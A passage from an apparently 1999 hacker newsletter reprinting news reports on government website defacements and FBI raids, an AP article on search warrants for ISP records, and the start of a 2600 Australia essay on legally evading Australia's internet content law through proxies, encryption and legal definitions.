  1512.      ôItÆs important to show (the attackers), æHey, you got us,
  1513.      but weÆre OK now.Æ ö
  1514.             The hacked pages claimed credit on behalf of a group
  1515.      called Forpaxe, including a member using the handle
  1516.      ôM1crochip.ö Similar credits appeared on hacked pages
  1517.      placed Tuesday on Web servers at Monash University in
  1518.      Australia and Coca-ColaÆs Belgian subsidiary, as well as a
  1519.      page that briefly appeared Monday at the Idaho National
  1520.      Engineering and Environmental LabÆs Web site. 
  1521.             The hacked pages indicated that M1crochip lived in
  1522.      Portugal ù which others in the hacker community
  1523.      confirmed. Another computer user said to be involved in the
  1524.      current wave of Web attacks reportedly lived in Britain.
  1525.             
  1526.      BACKGROUND ON THE FBI RAIDS
  1527.             Members of Global Hell reported that law-enforcement
  1528.      officials served search warrants last Wednesday in Texas,
  1529.      California and Washington state. AntiOnline, a Web site
  1530.      focusing on the hacker community, indicated that the sweep
  1531.      extended to other states as well.
  1532.             One of the subjects of the search warrants was a
  1533.      contractor working at Microsoft, which is a partner in the
  1534.      joint venture that operates MSNBC. When contacted by
  1535.      MSNBC, the contractor ù who uses the online handle
  1536.      ôVallaHö ù confirmed that nine law-enforcement agents
  1537.      served him with a warrant at his Seattle-area apartment,
  1538.      interrogated him and confiscated computer equipment. 
  1539.             He said he was not involved in any illegal activity and
  1540.      surmised that he was implicated by a former associate in the
  1541.      hacker community.
  1542.             FBI agents also contacted Microsoft, said company
  1543.      spokesman Adam Sohn.
  1544.             ôThis is an active investigation, and thereÆs not a lot we
  1545.      can say,ö Sohn said Monday. ôItÆs an FBI matter, itÆs not a
  1546.      Microsoft matter.ö
  1547.             He indicated that FBI agents were interested in
  1548.      computer equipment that VallaH used at Microsoft. ôAs far
  1549.      as I have been told, we are still in possession of the
  1550.      property. However, weÆre cooperating with the FBI in the
  1551.      investigation,ö Sohn said.
  1552.             VallaH said he was told not to report for work at
  1553.      Microsoft.
  1554.             ôWe did ask that his assignment at Microsoft be
  1555.      terminated. I donÆt know what his status is with his
  1556.      contracting agency,ö Sohn said.
  1557.             
  1558.      MEANWHILE, IN HOUSTON ...
  1559.             In Houston, FBI spokesman Rolando Moss told
  1560.      MSNBC that agents were investigating ôallegations of
  1561.      computer intrusionsö involving, among others, a teen-ager
  1562.      who uses the hacker handle ôMosthated.ö
  1563.             In telephone conversations with MSNBC, Mosthated
  1564.      said that his home was raided at about 6 a.m. CT
  1565.      Wednesday, and that family computer equipment was
  1566.      confiscated. He said his parents were ôreally mad. ... The
  1567.      computer had all their financial information and stuff on it.ö
  1568.      MosthatedÆs mother got on the line to read from the FBIÆs
  1569.      receipt for the equipment and confirm that she was ôreally
  1570.      mad.ö
  1571.             Mosthated said at least eight other people around the
  1572.      country had been served with search warrants as part of ôa
  1573.      huge hacker crackdown.ö Four other Houston-area
  1574.      hackers, three in California and one in the Seattle area
  1575.      reportedly received FBI visits. None was arrested, but all
  1576.      had computer equipment confiscated, he said.
  1577.             Media representatives at FBI offices in San Diego and
  1578.      Seattle said they could not comment on the investigation.
  1579.             
  1580.             Do you have a tip related to this story? Please
  1581.      send your suggestions to tipoff@msnbc.com.
  1582.                                  
  1583.       
  1584.      ABC;
  1585.      
  1586.      Hackers Strike Again
  1587.      Deface Interior Department and Supercomputer Lab Web Sites 
  1588.  
  1589.      By Ted Bridis
  1590.      The Associated Press
  1591.      W A S H I N G T O N, June 1 ù A spate of high-tech
  1592.      vandalism against the government continued this
  1593.      week, as computer hackers defaced two more
  1594.      federal Web sites and left a taunting note
  1595.      promising to attack other sites because of a
  1596.      related FBI investigation.
  1597.           Hackers from different organizations defaced Web
  1598.      sites Monday for the Interior Department and a federal
  1599.      supercomputer laboratory in Idaho Falls, Idaho, claiming
  1600.      ôitÆs our turn to hit them where it hurts.ö
  1601.           ôThese are the perils of open government,ö said
  1602.      Stephanie Hanna, an Interior spokeswoman. ôWe try to
  1603.      make as much of the materials of the Interior Department
  1604.      as open and available as possible. The consequence of
  1605.      that is, those who choose to do damaging things can do
  1606.      that.ö
  1607.           Messages left at the attacked sites suggest they were
  1608.      vandalized to retaliate against what was said to be the
  1609.      FBIÆs harassment of specific hacker groups, including the
  1610.      group that boasted of breaking into the White House site
  1611.      last month.
  1612.           The FBI confirmed it executed four search warrants
  1613.      last week in Texas related to an investigation into
  1614.      allegations of computer intrusion, including one search at
  1615.      the home of a prominent hacker in Houston. 
  1616.  
  1617.      FBI Took Down Site Last Week
  1618.      Last week, hackers claiming to be from another group
  1619.      defaced the Web site for the Senate, causing it to be
  1620.      taken offline through the weekend.
  1621.           The FBI also was forced to take down its own
  1622.      Internet site last week after hackers launched an electronic
  1623.      attack against it. It remained inaccessible Monday, along
  1624.      with the Web site for its National Infrastructure Protection
  1625.      Center, which helps investigate computer crimes.
  1626.           On InteriorÆs Web page, the hackers left a message
  1627.      Monday saying they were ôgoing after every computer on
  1628.      the Net with a .gov (suffix). ... WeÆll keep hitting them
  1629.      until they get down on their knees and beg.ö
  1630.           At the site maintained by the Idaho National
  1631.      Engineering and Environmental Laboratory, a note
  1632.      threatened the electronic destruction of the powerful
  1633.      computers that ôserveö pages on the Internet ôif the FBI
  1634.      doesnÆt stop.ö
  1635.           ôWe could have done worse, like destroying
  1636.      completely all servers,ö the note said. ôWe can do it if we
  1637.      want, but hackers are waiting for Justice.ö 
  1638.  
  1639.      Warnings of More to Come 
  1640.      In an online interview with The Associated Press, the
  1641.      hacker claiming responsibility for the laboratory attack
  1642.      warned that further FBI investigation would result in more
  1643.      severe damage.
  1644.           The hacker identified himself only as M1crochip, living
  1645.      in Portugal and part of a group calling themselves
  1646.      F0rpaxe. The interview was arranged through a mutually
  1647.      trusted third party.
  1648.           ôIf FBI doesnÆt do anything and doesnÆt stop arresting
  1649.      people and making our life miserable, each member of
  1650.      F0rpaxe will discuss an eventual destruction of every
  1651.      single server,ö he said. ôIf that happens, everything goes
  1652.      down.ö
  1653.           He added, ôWe donÆt want to proceed that way,ö and
  1654.      called the electronic attacks the ôonly resourceö of the
  1655.      hacker community.
  1656.           The FBI in Washington declined comment Monday.
  1657.           Earlier this month, a grand jury in northern Virginia
  1658.      indicted Eric Burns, 19, on three counts of computer
  1659.      intrusion. Burns reportedly is known on the Internet as
  1660.      ôZyklonö and is believed to be a member of the group that
  1661.      claimed responsibility for the attacks on the White House
  1662.      and Senate sites.
  1663.           ôZyklonö was one of a dozen names listed on the
  1664.      hacked version of the White House Web site, which was
  1665.      altered overnight Sunday for a few minutes before
  1666.      government computers automatically detected the
  1667.      intrusion.
  1668.           Burns was accused of breaking into a computer used
  1669.      by the U.S. Information Agency between August 1998
  1670.      and January 1999. The grand jury also said Burns broke
  1671.      into two other computers, one owned by LaserNet of
  1672.      Fairfax, Va., and the other by Issue Dynamics Inc. of
  1673.      Washington. 
  1674.      
  1675.      
  1676.      Nando Times;
  1677.      
  1678.      Two more federal Web sites hacked 
  1679.  
  1680.       Copyright ⌐ 1999 Nando Media
  1681.       Copyright ⌐ 1999 Associated Press
  1682.       
  1683.       By TED BRIDIS 
  1684.       
  1685.       WASHINGTON (June 1, 1999 7:40 a.m. EDT http://www.nandotimes.com) - A spate of 
  1686.       high-tech vandalism against the government continued this week as computer 
  1687.       hackers defaced two more federal Web sites and left a taunting promise to attack
  1688.       other sites because of a related FBI investigation. 
  1689.       
  1690.       Hackers from different organizations defaced Web sites Monday for the Interior 
  1691.       Department and a federal supercomputer laboratory in Idaho Falls, Idaho, claiming
  1692.        "it's our turn to hit them where it hurts." 
  1693.       
  1694.       "These are the perils of open government," said Stephanie Hanna, an Interior 
  1695.       spokeswoman. "We try to make as much of the materials of the Interior Department
  1696.       as open and available as possible. The consequence of that is, those who choose 
  1697.       to do damaging things can do that." 
  1698.       
  1699.       Messages left at the attacked sites suggest they were vandalized to retaliate 
  1700.       against what was said to be the FBI's harassment of specific hacker groups, 
  1701.       including the group that boasted of breaking into the White House site last month. 
  1702.       
  1703.       The FBI confirmed it executed four search warrants last week in Texas related to an
  1704.       investigation into allegations of computer intrusion, including one search at the 
  1705.       home of a prominent hacker in Houston. 
  1706.       
  1707.       Last week, hackers claiming to be from another group defaced the Web site for the 
  1708.       Senate, causing it to be taken offline through the weekend. 
  1709.       
  1710.       The FBI also was forced to take down its own Internet site last week after hackers
  1711.       launched an electronic attack against it. It remained inaccessible Monday, along with
  1712.       the Web site for its National Infrastructure Protection Center, which helps investigate
  1713.       computer crimes. 
  1714.       
  1715.       On Interior's Web page, the hackers left a message Monday saying they were "going after
  1716.       every computer on the Net with a .gov (suffix). ... We'll keep hitting them until they 
  1717.       get down on their knees and beg." 
  1718.       
  1719.       At the site maintained by the Idaho National Engineering and Environmental Laboratory, a
  1720.       note threatened the electronic destruction of the powerful computers that "serve" pages 
  1721.       on the Internet "if the FBI doesn't stop." 
  1722.       
  1723.       "We could have done worse, like destroying completely all servers," the note said. "We 
  1724.       can do it if we want, but hackers are waiting for Justice." 
  1725.       
  1726.       In an online interview with The Associated Press, the hacker claiming responsibility for
  1727.       the laboratory attack warned that further FBI investigation would result in more severe damage. 
  1728.       
  1729.       The hacker identified himself only as M1crochip, living in Portugal and part of a group calling 
  1730.       themselves F0rpaxe. The interview was arranged through a mutually trusted third party. 
  1731.       
  1732.       "If FBI doesn't do anything and doesn't stop arresting people and making our life miserable, 
  1733.       each member of F0rpaxe will discuss an eventual destruction of every single server," he said. 
  1734.       "If that happens, everything goes down." 
  1735.       
  1736.       He added, "We don't want to proceed that way," and called the electronic attacks the "only
  1737.        resource" of the hacker community. 
  1738.       
  1739.       The FBI in Washington declined comment Monday. 
  1740.       
  1741.       Earlier this month, a grand jury in northern Virginia indicted Eric Burns, 19, on three counts 
  1742.       of computer intrusion. Burns reportedly is known on the Internet as "Zyklon" and is believed to
  1743.       be a member of the group that claimed responsibility for the attacks on the White House and Senate
  1744.       sites. 
  1745.       
  1746.       "Zyklon" was one of a dozen names listed on the hacked version of the White House Web site, which
  1747.       was altered overnight Sunday for a few minutes before government computers automatically detected
  1748.       the intrusion. 
  1749.       
  1750.       Burns was accused of breaking into a computer used by the U.S. Information Agency between August
  1751.       1998 and January 1999. The grand jury also said Burns broke into two other computers, one owned by
  1752.       LaserNet of Fairfax, Va., and the other by Issue Dynamics Inc. of Washington. 
  1753.       
  1754.  
  1755.      
  1756.       
  1757.        @HWA        
  1758.        
  1759.  06.0 Threat to online privacy: The Search Warrant
  1760.       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  1761.       
  1762.       From HNN http://www.hackernews.com/
  1763.       
  1764.       New Threat to Online Privacy, The Search Warrant 
  1765.  
  1766.  
  1767.       contributed by mortel 
  1768.       This article gives the impression that some of todays
  1769.       legal practices are a good anti crime thing but judges
  1770.       are handing out search warrants that cover online
  1771.       communications like candy. That email from your doctor
  1772.       is just as much fair game as the one from your secret
  1773.       lover. Judges must be educated so that limits can be
  1774.       placed on these things. A choice quote from the article
  1775.       "AOL is extremely law-enforcement friendly," Ron Horack
  1776.       of the Loudoun County, Va., sheriff's department said,
  1777.       "They don't hold anything back." 
  1778.  
  1779.       ABC News      
  1780.       http://www.abcnews.go.com/sections/tech/DailyNews/privacy990528.html
  1781.       
  1782.       What We Leave Behind
  1783.       Online Activities Become Open Trail for Authorities 
  1784.  
  1785.       By Calvin Woodward
  1786.       The Associated Press
  1787.       L E E S B U R G,   Va.,   May 28 ù Go for a walk,
  1788.       drive a car or dance in the moonlight and
  1789.       chances are, no one notices. Journey on the
  1790.       Internet and a trail is left. 
  1791.            And police are hot on that trail in a growing number of
  1792.       criminal investigations. 
  1793.            Armed with search warrants, police are looking into
  1794.       the online activities of suspects, and sometimes victims, by
  1795.       seizing evidence from Internet service providers and
  1796.       finding material that people online never dreamed would
  1797.       end up in the hands of the law. 
  1798.            Private e-mail between lovers. The threatening
  1799.       missives of haters. The true identities of people hiding
  1800.       behind screen names in a medium they thought was the
  1801.       essence of secrecy. 
  1802.  
  1803.       Va. Sheriff Helps Get AOL Help
  1804.       ôUltimately, if you break the law, it can be traced,ö said
  1805.       investigator Ron Horack of the Loudoun County, Va.,
  1806.       sheriffÆs department. Horack helps police around the
  1807.       country apply for search warrants to get material from the
  1808.       county-based America Online, the worldÆs largest Internet
  1809.       service provider with 18 million customers. 
  1810.            ôI know who you are and where you live,ö an
  1811.       anonymous hatemonger e-mailed a 12-year-old girl in
  1812.       Lancaster, Pa. By peeking into the accounts of Internet
  1813.       providers, police can often say the same thing: They know
  1814.       who the threatening people are and where they live. 
  1815.            This week federal authorities said they had charged a
  1816.       northern Virginia pediatrician with possessing child
  1817.       pornography after investigating his AOL account and
  1818.       finding at least 22 explicit images sent to him via e-mail
  1819.       over the course of nearly six months. They said they then
  1820.       found more child pornography on his computer. The
  1821.       doctor could not immediately be reached for comment. 
  1822.  
  1823.       Wide Powers of Warrant
  1824.       With a warrant, law enforcement authorities can look at
  1825.       the electronic mail and other online communications of
  1826.       people suspected of a range of serious crimes, getting
  1827.       information not just from a home computer but often the
  1828.       company that provides the Internet, e-mail or chat service.
  1829.  
  1830.            They can do the same with victims, in the process
  1831.       seeing mail from people who corresponded with them but
  1832.       had nothing to do with a crime. Everything from humdrum
  1833.       to-do lists to love letters from illicit digital dalliances
  1834.       becomes potential evidence, and eventually a matter of
  1835.       public record. 
  1836.            ôIt is a growing risk to privacy,ö said Marc Rotenberg,
  1837.       executive director of the Electronic Privacy Information
  1838.       Center, who says police should stick to traditional
  1839.       methods such as stings, informants and forensic evidence,
  1840.       which donÆt invade peopleÆs communications. 
  1841.            Said Horack: ôIf theyÆre going to use the Internet for
  1842.       their crime, weÆre going to use the Internet to catch them.ö
  1843.  
  1844.       Used in Littleton Investigation
  1845.       Authorities turned to AOL to see some of the online
  1846.       activities of the two high school students who killed 13
  1847.       other people and themselves in Littleton, Colo., last
  1848.       month. TheyÆve used it to try to track down some of the
  1849.       copycat threats that have closed many schools since. 
  1850.            They took the same route, thus far with inconclusive
  1851.       results, after a woman in Pennsylvania was told in a chat
  1852.       room, ôI guarantee you I will hurt you if you donÆt listen to
  1853.       me,ö and when a man in New York was charged with
  1854.       attempted murder of his wife, who, police say, was having
  1855.       a passionate online encounter her husband happened to
  1856.       see. 
  1857.            ôAOL is extremely law-enforcement friendly,ö Horack
  1858.       said. ôThey donÆt hold anything back.ö 
  1859.            America Online tells its nearly 18 million customers it
  1860.       wonÆt read or disclose private communication or personal
  1861.       identifying information except under a ôvalid legal
  1862.       process.ö 
  1863.  
  1864.       Most ISPs Have Similar Rules
  1865.       Other major Internet service providers, or ISPs, as well
  1866.       as separate online e-mail services and Internet hubs like
  1867.       Hotmail and Yahoo, say much the same, although the
  1868.       disclaimers may be hard to find in screens of small print. 
  1869.            ôWe have a long-standing policy of cooperation with
  1870.       law enforcement,ö said AOL spokesman Rich DÆAmato. 
  1871.            Communications such as e-mail are disclosed only in
  1872.       criminal investigations and with a warrant, he says. In
  1873.       response to orders in civil cases, AOL may give out
  1874.       information allowing someoneÆs real name to be matched
  1875.       to a screen name. 
  1876.            So if a spouse is found to be having an online affair
  1877.       with someone known only as Heart4U, the identity of that
  1878.       cyberlover might eventually be uncovered in a divorce
  1879.       proceeding. 
  1880.  
  1881.       Chat Rooms Not That Anonymous
  1882.       Raytheon Inc. obtained subpoenas to identify 21 people,
  1883.       most of them employees, said to have been spreading
  1884.       corporate secrets and gripes in an anonymous online chat
  1885.       room. 
  1886.            It then dropped a lawsuit it had brought against the 21,
  1887.       each identified as ôJohn Doe,ö indicating to privacy
  1888.       experts that the company had gone to court in the first
  1889.       place only to learn the identities of the chatters. Four
  1890.       employees quit; others entered corporate ôcounseling.ö 
  1891.            Privacy advocates worry that authorities could go on
  1892.       increasingly invasive fishing expeditions. 
  1893.            ôThere are simply many more events that are recorded
  1894.       (online) that would not be recorded in the physical world,ö
  1895.       said Rotenberg. ôI think it is going to become an
  1896.       enormous problem as people become more and more
  1897.       dependent on ISPs.ö 
  1898.  
  1899.       Anonymous Options Fight Back
  1900.       Meanwhile, tools continue to be developed to protect
  1901.       anonymity ù a site called anonymizer.com, for one, will
  1902.       relay e-mail, stripping out the senderÆs identifying
  1903.       information. 
  1904.            So far, at least, few warrants going to AOL look like
  1905.       goose chases, an impression formed after a review of the
  1906.       more than 100 that have been filed in Leesburg this year. 
  1907.            Most involve alleged pedophiles, stalkers and
  1908.       harassers who have used the Internet to find prey and left
  1909.       evidence of their intentions with victims or undercover
  1910.       police. 
  1911.            Horack prepares warrant applications for police from
  1912.       other parts of the country, some so new to digital
  1913.       detective work they need their childrenÆs help to get
  1914.       online. Once they are approved by a magistrate, he takes
  1915.       them to AOL and retrieves the information. ItÆs almost a
  1916.       full-time job, offered by the sheriff because the company
  1917.       gives such a big boost to the county. 
  1918.  
  1919.       Works Well With Pedophile Search
  1920.       The warrants are especially effective against child
  1921.       pornographers, Horack says. ôPedophiles are pack rats.
  1922.       They donÆt throw away anything.ö Even when they do
  1923.       delete material from their computer, it might be found at
  1924.       the service provider. 
  1925.            In the case of the 12-year-old Pennsylvania girl,
  1926.       nothing turned up in the AOL search. Most of the time,
  1927.       something does. 
  1928.            For example, police in Hendersonville, Tenn., turned
  1929.       to AOL to see the Internet activity of Dennis Wayne
  1930.       Cope, 47, shot and found dead in a crawl space of his
  1931.       home in February. 
  1932.            In an affidavit seeking access to CopeÆs e-mail,
  1933.       ôbuddy list contentö and other online activities, police said
  1934.       he had been corresponding online with the estranged wife
  1935.       of suspect Robert Lee Pattee. They also say PatteeÆs
  1936.       hand print was found at the scene. 
  1937.           Pattee has been charged with first-degree murder. 
  1938.        
  1939.        @HWA
  1940.        
  1941.        
  1942.  07.0 2600 in Aussieland bares its teeth at the current clampdown on The Net
  1943.       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  1944.       
  1945.       2600.org.au Issues Instructions for Legally
  1946.       Circumventing the Law 
  1947.  
  1948.  
  1949.       contributed by webmaster 
  1950.       The Australian government is introducing internet
  1951.       content regulation this week despite extensive
  1952.       opposition from free speech advocates and technical
  1953.       advisors. Given that fighting the law itself is now
  1954.       apparently futile, 2600 Australia has critiqued the law
  1955.       and described apparently legal ways in which you can
  1956.       evade it. We're not sure what the fallout from spelling
  1957.       out how to (legally) evade the law will be, but take a
  1958.       look while you can... 
  1959.  
  1960.       2600.org.au 2600.org.au Issues Instructions for Legally
  1961.       Circumventing the Law 
  1962.  
  1963.  
  1964.       contributed by webmaster 
  1965.       The Australian government is introducing internet
  1966.       content regulation this week despite extensive
  1967.       opposition from free speech advocates and technical
  1968.       advisors. Given that fighting the law itself is now
  1969.       apparently futile, 2600 Australia has critiqued the law
  1970.       and described apparently legal ways in which you can
  1971.       evade it. We're not sure what the fallout from spelling
  1972.       out how to (legally) evade the law will be, but take a
  1973.       look while you can... 
  1974.  
  1975.       2600.org.au    
  1976.       http://www.2600.org.au/censorship-evasion.html
  1977.       
  1978.       Interesting reading, check it out.
  1979.       
  1980.       
  1981.      Evading the Broadcasting Services Amendment (Online Services) Act
  1982.                                                          1999 
  1983.                                                          by Dogcow 
  1984.  
  1985.      Reference Links: 
  1986.  
  1987.           US Mirror - US Mirror of this document (for obvious reasons) 
  1988.           http://members.xoom.com/2600aus/censorship-evasion.html
  1989.           
  1990.           Broadcasting Services Amendment (Online Services) Act 1999 - PDF format 
  1991.           http://www.aph.gov.au/parlinfo/billsnet/99077.pdf
  1992.           
  1993.           Broadcasting Services Amendment (Online Services) Act 1999 - HTML format 
  1994.           http://www.ozemail.com/~mbaker/amended.html
  1995.           
  1996.           Senate Select Committee on Information Technologies - Index 
  1997.           http://www.aph.gov.au/hansard/senate/commttee/s-it.htm
  1998.           
  1999.           Squid - an open source proxy server 
  2000.           http://www.nlanr.net/Squid/
  2001.           
  2002.           NLANR Cache - an open proxy hierarchy 
  2003.           http://www.nlanr.net/Cache/
  2004.           
  2005.           Anti CensorWare Proxy - Masks the URL you're accessing 
  2006.           http://ians.978.org/rdrp-c/
  2007.           
  2008.           Free S/WAN - an IPSEC implementation for Linux 
  2009.           http://www.xs4all.nl/~freeswan
  2010.           
  2011.           PGP - International download site 
  2012.           http://www.replay.com/menu/pgp.html
  2013.           
  2014.           SSL - Open Source SSL implementation 
  2015.           http://www.openssl.org/
  2016.           
  2017.           FTP by email - instructions 
  2018.           ftp://rtfm.mit.edu/pub/usenet/news.answers/internet-services/access-via-email
  2019.           
  2020.           BugTraq Mailing List - Web Archive 
  2021.           http://www.netspace.org/lsv-archive/bugtraq.html
  2022.           
  2023.           Words filtered by iFilter - Thanks to Danny Yee 
  2024.           http://www.anatomy.usyd.edu.au/danny/freedom/censorware/ifilter.html
  2025.  
  2026.      Introduction 
  2027.  
  2028.      Australia's citizens are about to be subject to content regulation on the Internet following the introduction of an amendment to existing
  2029.      legislation relating to broadcasting services. This legislation defines certain responsibilities for the ABA (Australian Broadcasting
  2030.      Authority), the OFLC (Office of Film and Literature Classification) and any company or individual providing public access to "Internet
  2031.      content". All rhetoric aside about "big brother" and how this legislation spells the end of free speech in this country, it is acknowledged
  2032.      by most if not all participants in the debate about this legislation that, for a number of reasons it will be very difficult if not impossible
  2033.      to effectively stem the tide of what the government calls "illegal and offensive material". 
  2034.  
  2035.      This paper has one aim - to highlight the futility of attempting such content regulation by explicitly describing the legal means by which
  2036.      citizens can evade the provisions within the legislation. 
  2037.  
  2038.      Warning 
  2039.  
  2040.      I believe that all Australian laws should be in language understandable by ordinary Australians. This paper is my interpretation of the
  2041.      Broadcasting Services Amendment (Online Services) Act 1999 and should not be construed as anything more than this. Just as I believe
  2042.      what you view on the Internet should be your own responsibility, if you choose to follow any of my suggestions here, it's your sole
  2043.      responsibility to deal with any adverse or unforseen consequences of those actions. That said, if you disagree with anything I've said
  2044.      here, feel free to contact me. 
  2045.  
  2046.      The means of evasion... 
  2047.  
  2048.      I should point out that most of these means of evasion assume that the content you want to access is outside the country and
  2049.      therefore beyond the effective reach of the "take down notices" mentioned in the legislation. 
  2050.  
  2051.           Use an alternate proxy network - connect to a different proxy server on a non-standard port 
  2052.           Mask web content before entering the proxy network - change some words, change some server names 
  2053.           Encrypt the content - they can't regulate what they can't read 
  2054.                Encrypt web content before it enters the proxy network 
  2055.                Use an encrypted VPN/tunnel for streaming content 
  2056.           Distribute content by means of a "company" to your "employees" 
  2057.           Offer on-demand, point-to-point email access to content 
  2058.           Flood the ABA with legitimate, appropriate complaints 
  2059.           Use a "recognised alternative access prevention arrangement" 
  2060.           Mirror content so widely as to prevent effective enforcement of the legislation 
  2061.  
  2062.      Use an alternate proxy network 
  2063.  
  2064.      You should be able to access any content you wish by connecting to a proxy server network outside Australia either directly from your
  2065.      browser on a port other than 80, 3128 or 8080 (the most popular proxy server ports, and the ones most likely being transparently
  2066.      proxied) or using a Squid-like cache internal to your network that accesses a proxy hierarchy outside Australia on a port other than
  2067.      3130 (the standard ICP port). 
  2068.  
  2069.      This assumes that the government does not mandate the use of a packet level filter, regardless of how ineffective one might be at
  2070.      locating banned content in a stream of data passing through it and preventing access to it. If it were to do this, it would most likely be
  2071.      done using an industry standard able to be defined under Part 5 of the legislation. 
  2072.  
  2073.      Transparent proxying, for those unsure of it's meaning, is the process of redirecting a users' outgoing web content request through a
  2074.      network switch capable of what's called layer 3 routing. Layer 3 routing enables the network switch to invisibly redirect the web
  2075.      content request away from the intended destination into a proxy server which then fetches the web content for you, assuming it's not
  2076.      been configured to block certain URLs or certain media types (mpg movies, for example). 
  2077.  
  2078.      Mask web content before entering the proxy network 
  2079.  
  2080.      Assume your ISP uses transparent proxying methods to pass all web content through a filter of some kind. What about masking the web
  2081.      content in some way at the server (aka "internet host") end such that when it passes unhindered through the proxy network, your
  2082.      computer can unmask the information, making it visible to you . A basic example of this, but one that only masks the URL you're trying
  2083.      to access is accessible here. The Youth Alliance against Internet Censorship offers information on software for your computer that can
  2084.      disable a proxy server here. 
  2085.  
  2086.      Encrypt the content before it enters the proxy network 
  2087.  
  2088.      Above, I mentioned the ability to mask content on the server side before it passes through the proxy network. The same concept can
  2089.      applied to any Internet content using encryption. This could be achieved using a traditional SSL-based transaction between a server
  2090.      and your own computer, by means of a PGP-based transaction with an appropriately configured server, or by using any other form of
  2091.      encryption that prevents decryption by anyone other than yourself. 
  2092.  
  2093.      Use an encrypted VPN/tunnel for streaming content 
  2094.  
  2095.      A VPN is a Virtual Private Network. It allows physically separate networks to operate in a homogenous fashion by encrypting packets at
  2096.      one particular "endpoint", tunnelling them (sending in a point-to-point fashion) across the internet, then decrypting them at some other
  2097.      "endpoint", protecting the information being passed between the two networks. A typical use of a VPN is by a company with offices in
  2098.      different cities or in different countries. VPN technologies are offered by a number of major networking vendors including Cisco, Bay
  2099.      Networks and Ascend, though usually with a fairly high price tag attached. At a more grass roots level, end users can download and
  2100.      use a product called SSH (Secure Shell) to give them secure network access to UNIX shells and set up encrypted tunnels between two
  2101.      hosts. For Linux users, the kernel comes with tunnelling code built-in and can be made secure with IPSEC patches available from the
  2102.      Netherlands. 
  2103.  
  2104.      Distribute content by means of a "company" to your "employees" 
  2105.  
  2106.      The legislation allows for information to be distributed to an end-user provided they are within your "immediate circle" and is described
  2107.      in Subclause 9(1-4): 
  2108.  
  2109.           9 Supply to the public 
  2110.  
  2111.                 (1) This clause sets out the circumstances in which an Internet carriage
  2112.                 service is taken, for the purposes of subclause 8(1), to be supplied to the
  2113.                 public. 
  2114.                 (2) If: 
  2115.                       (a) an Internet carriage service is used for the carriage of information
  2116.                           between 2 end-users; and 
  2117.                       (b) each end-user is outside the immediate circle of the supplier
  2118.                           of the service;
  2119.                           
  2120.                 the service is supplied to the public. 
  2121.                     
  2122.                     Note: If a company makes Internet content available for access on the Internet,
  2123.                     and an individual obtains access to the content using an Internet carriage
  2124.                     service, the company and the individual are end-users in relation to the carriage
  2125.                     of the content by the Internet carriage service. 
  2126.                     
  2127.                 (3) If: 
  2128.                       (a) an Internet carriage service is used to supply point-to-multipoint
  2129.                           services to end-users; and 
  2130.                       (b) at least one end-user is outside the immediate circle of the supplier
  2131.                           of the service;
  2132.                           
  2133.                 the service is supplied to the public. 
  2134.                     
  2135.                 (4) If: 
  2136.                       (a) an Internet carriage service is used to supply designated content services
  2137.                           (other than point-to-multipoint services) to end-users; and 
  2138.                       (b) at least one end-user is outside the immediate circle of the supplier of
  2139.                           the service; 
  2140.                           
  2141.                 the service is supplied to the public. 
  2142.  
  2143.      The thing to note here are the words "immediate circle". Jumping back up in the document to the definition, we note it refers to the
  2144.      Telecommunications Act of 1997. Jumping to the (rather long) definition in that legislation, we find that your "immediate circle" refers to
  2145.      employees if you are a company: 
  2146.  
  2147.           Immediate circle 
  2148.  
  2149.           SECT. (1) For the purposes of this Act, a person's "immediate circle" consists of the person, together with the following persons:
  2150.  
  2151.                 (a) if the person is an individual--an employee of the individual;
  2152.                 
  2153.           continued...
  2154.  
  2155.      In theory, using this aspect of the legislation, you could create a company and employ individuals interested in the banned content you
  2156.      have on offer. Far fetched, but apparently possible. The definition, interestingly, would also allow a University to offer banned content
  2157.      to it's employees and students. 
  2158.  
  2159.      Offer on-demand, point-to-point email access to content 
  2160.  
  2161.      In the early days of the commercial internet, before the invention of the World Wide Web, not everybody had access to the FTP sites
  2162.      that contained lots of information. The way most people got around this restriction/limitation was using a service called ftp-by-email.
  2163.      To use it, you'd send an email to a certain address containing a sequence of standard ftp commands, as follows: 
  2164.  
  2165.           From: 2600 Webmaster (webmaster@2600.org.au)
  2166.           To: FTP-By-Email (ftpmail@ftp.sunet.se)
  2167.  
  2168.           open mirror.aarnet.edu.au
  2169.           cd pub/linux/kernel
  2170.           cd v2.2
  2171.           binary
  2172.           get README
  2173.           quit
  2174.  
  2175.      Following the receipt of this email, any files you had requested with a "get" command would be emailed back to you. A rundown of how
  2176.      this (still) works can be found here. 
  2177.  
  2178.      Now, referring to the legislation, we find the following definition of "Internet content": 
  2179.  
  2180.           Internet content means information that: 
  2181.                       (a) is kept on a data storage device; and 
  2182.                       (b) is accessed, or available for access, using an Internet carriage service;
  2183.                 but does not include: 
  2184.                       (c) ordinary electronic mail; or 
  2185.                       (d) information that is transmitted in the form of a broadcasting service. 
  2186.  
  2187.      and of "ordinary electronic mail": 
  2188.  
  2189.           ordinary electronic mail does not include a posting to a newsgroup. 
  2190.  
  2191.      Are you thinking what I'm thinking? Assuming the content is not accessible to the public by any means other than point-to-point,
  2192.      user-requested email, you could be very well within the law to offer content that is otherwise banned in any other forum. 
  2193.  
  2194.      Flood the ABA with legitimate, appropriate complaints 
  2195.  
  2196.      I'll start describing this means of evasion by displaying Clause 26. Take particular note of Subclause 26(2b): 
  2197.  
  2198.           26 Investigation of complaints by the ABA 
  2199.  
  2200.                 (1) The ABA must investigate a complaint under Division 1. 
  2201.                 
  2202.                 (2) However, the ABA need not investigate the complaint if: 
  2203.                       (a) the ABA is satisfied that the complaint is: 
  2204.                             (i) frivolous; or 
  2205.                             (ii) vexatious; or 
  2206.                             (iii) not made in good faith; or 
  2207.                       (b) the ABA has reason to believe that the complaint was made for the purpose, or for
  2208.                           purposes that include the purpose, of frustrating or undermining the effective
  2209.                           administration of this Schedule. 
  2210.                           
  2211.                 (3) The ABA must notify the complainant of the results of such an investigation. 
  2212.                 
  2213.                 (4) The ABA may terminate such an investigation if it is of the opinion that it does not have
  2214.                     sufficient information to conclude the investigation. 
  2215.  
  2216.      Okay, so they thought people might flood them with frivolous complaints... Fair enough. But isn't it the case that every site that is not
  2217.      investigated by the ABA remains unregulated and therefore free? I'm sure you can put two and two together on this one. 
  2218.  
  2219.      Use a "recognised alternative access prevention arrangement" 
  2220.  
